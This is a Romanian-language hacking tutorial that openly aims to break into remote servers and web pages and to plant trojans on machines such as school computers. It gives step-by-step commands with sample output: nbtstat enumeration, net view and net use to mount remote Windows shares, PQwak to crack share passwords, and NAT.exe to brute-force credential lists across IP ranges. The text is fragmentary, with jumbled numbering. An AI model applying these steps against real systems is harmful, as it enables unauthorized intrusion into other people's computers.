1)Hackeriti serverul de la distanta 2)Hackeriti paginile Web gazduite de acesta 3)Infiltrati troieni peun calculator pe care aveti acces(cum ar fi calculatorul scolii). 11)In tutorialul precedent a fost prezentata o mare vulnerabilitate a windowsului si anume optiunea "file and print sharing".Programele necesare sunt nbtstat.exe(il aveti deja),net.exe(probabil il aveti si pe acesta) si nat.exe.Deoarece stiti deja ce face nbtstatul trcecem la celelalte doua programe.In exemplul nostru presupunem ca serverul are IP-ul 123.123.123.123. iar numele este server.com .IP-ul se poate afla cu ajutorul comenzii "tracert -j www.server.com."Apoi se foloseste comanda "nbtstat -A 123.123.123.123. "Iata rezultatul acestei comenzi: NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- STUDENT1 <20> UNIQUE Registered STUDENT1 <00> UNIQUE Registered DOMAIN1 <00> GROUP Registered DOMAIN1 <1C> GROUP Registered DOMAIN1 <1B> UNIQUE Registered STUDENT1 <03> UNIQUE Registered DOMAIN1 <1E> GROUP Registered DOMAIN1 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-C0-4F-C4-8C-9D Student1 este numele computerului.Apoi dupa ce am aflat aceasta informatie tastam: C:\>net view 123.123.123.123 C:\>net view \\student1 Shared resources at 123.123.123.123 Share name Type Used as Comment ------------------------------------------------------------------------------ NETLOGON Disk Logon server share Test Disk The command completed successfully. Asa aflam daca optiunea "file and print sharing este" activata.Apoi tastam urmatoarea comanda: C:\net use x: \\123.123.123.123\test The command completed successfully. Acum sa accesam noul disc creat si anume X: C:\net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK X: \\123.123.123.123\test Microsoft Windows Network OK \\123.123.123.123\test Microsoft Windows Network The command completed successfully. In mod normal cand gasim un calculator cu "file and print sharing" ni se cere o parola.Aceata parola o putem sparge cu ajutorul programului PQwak.exe.Rulati-l,completati formularul si apoi asteptati.Nu trebuie sa asteptati prea mult. Acum sa prezentam programul Nat.exe,foarte preferat de hackeri.Iata optiunile acestuia: NAT.EXE [-o filename] [-u userlist] [-p passlist]
OPTIONS -o Specifica fisierul in care se vor depune rezultatele scanarii unei "raze" de IP. -u Specifica fisierul care contine numele de utilizatori(useri) -p Specifica fisierul care contine parolele(password) raza de IP care trebuie scanata.Iata un exempu. C:\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30 Chiar daca nu "sparge" parola,totusi gaseste calculatoarele cu "file and print sharing" ceea ce este acelasi lucru pentu ca folosim programul PQwak. 2)Acesta este o lista care contine fisiere importante de pe server in relatie cu discul c:/ adica adresa fizica. C:\InetPub\wwwroot